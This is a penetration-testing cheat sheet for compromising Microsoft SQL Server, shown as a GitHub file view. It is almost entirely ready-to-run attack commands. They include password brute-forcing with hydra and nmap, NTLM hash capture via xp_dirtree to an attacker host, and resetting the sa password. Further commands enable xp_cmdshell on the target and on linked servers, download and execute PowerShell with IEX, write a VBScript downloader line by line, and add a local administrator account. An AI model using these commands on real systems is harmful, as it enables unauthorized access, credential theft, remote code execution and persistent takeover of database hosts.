-
Notifications
You must be signed in to change notification settings - Fork 36
/
Copy pathTarget.Host.Service.DB.MSSQL.txt
169 lines (140 loc) · 5.13 KB
/
Target.Host.Service.DB.MSSQL.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
`` Scanning
~$ nmap VAR_TARGET_HOST -v -p 1433 -sV -Pn -vv --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password,ms-sql-tables
`` Password Bruteforcing
~$ nmap -p 1433 --script ms-sql-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST
~$ hydra -L VAR_WORDLIST_USER -V -P VAR_WORDLIST_PASSWORD VAR_TARGET_HOST mssql
`` TDS Versions
- 7.0
- SQL Server 7.0
- 7.1
- SQL Server 2000
- 7.1 Revision 1
- SQL Server 2000 SP1
- 7.2
- SQL Server 2005
- 7.3.A
- SQL Server 2008
- 7.3.B
- SQL Server 2008 R2
- 7.4
- SQL Server 2012
- SQL Server 2014
- SQL Server 2016
- SQL Server 2017
- SQL Server 2019
`` Remote console
~$ vim ~/.sqshrc
~$ sqsh -S mssql1
`` Capturing NTLM
> EXEC master..xp_dirtree "\\VAR_ATTACKER_HOST\\test";
`` Change sa password
~> net stop MSSQL$SQLEXPRESS
~> net start MSSQL$SQLEXPRESS /m sqlcmd
~> sqlcmd
> ALTER LOGIN [sa] WITH DEFAULT_DATABASE=[master]
> GO
> USE [master]
> GO
> ALTER LOGIN [sa] WITH CHECK_POLICY = OFF;
> GO
> ALTER LOGIN [sa] WITH PASSWORD=N'sa';
> GO
~> net stop MSSQL$SQLEXPRESS
~> net start MSSQL$SQLEXPRESS
`` Linked servers
`` List
> EXEC sp_linkedservers;
`` Execute on linked server
> SELECT version FROM OPENQUERY("VAR_TARGET_HOST", 'SELECT @@version AS version')
`` Remote execution
> EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT VAR_TARGET_HOST
> EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT VAR_TARGET_HOST
> EXEC ('xp_cmdshell ''whoami'';') AT VAR_TARGET_HOST
`` With metasploit
> use auxiliary/admin/mssql/mssql_sql
> set USERNAME VAR_USERNAME
> set PASSWORD VAR_PASSWORD
> set DOMAIN VAR_DOMAIN
> set USE_WINDOWS_AUTHENT yes
> set RHOSTS VAR_TARGET_HOST
> set SQL "EXEC master..xp_dirtree '\\\\VAR_ATTACKER_HOST\\test'"
> run
`` xp_cmdshell
`` The basic approach
> exec sp_configure "show advanced options", 1
> reconfigure
> exec sp_configure "xp_cmdshell", 1
> reconfigure
> xp_cmdshell "whoami"
`` Download and execute PowerShell
> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://VAR_TARGET_HOST/script.ps1\");"
`` wget.vbs
xp_cmdshell 'echo strUrl = WScript.Arguments.Item(0) > wget.vbs'
go
xp_cmdshell 'echo StrFile = WScript.Arguments.Item(1) >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs'
go
xp_cmdshell 'echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs'
go
xp_cmdshell 'echo Err.Clear >> wget.vbs'
go
xp_cmdshell 'echo Set http = Nothing >> wget.vbs'
go
xp_cmdshell 'echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs'
go
xp_cmdshell 'echo http.Open "GET",strURL,False >> wget.vbs'
go
xp_cmdshell 'echo http.Send >> wget.vbs'
go
xp_cmdshell 'echo varByteArray = http.ResponseBody >> wget.vbs'
go
xp_cmdshell 'echo Set http = Nothing >> wget.vbs'
go
xp_cmdshell 'echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs'
go
xp_cmdshell 'echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs'
go
xp_cmdshell 'echo strData = "" >> wget.vbs'
go
xp_cmdshell 'echo strBuffer = "" >> wget.vbs'
go
xp_cmdshell 'echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs'
go
xp_cmdshell 'echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs'
go
xp_cmdshell 'echo Next >> wget.vbs'
go
xp_cmdshell 'echo ts.Close >> wget.vbs'
go
`` Using sqsh
~$ cat ~/.freetds.conf
[mssql1]
host = VAR_TARGET_HOST
port = 27900
tds version = 8.0
~$ sqsh -S mssql1 -U sa
> exec sp_configure "show advanced options", 1
> go
> reconfigure
> go
> exec sp_configure "xp_cmdshell", 1
> go
> reconfigure
> go
> xp_cmdshell "whoami"
> go
> xp_cmdshell "net user VAR_USERNAME VAR_PASSWORD /add"
> xp_cmdshell "net localgroup administrators VAR_USERNAME /add"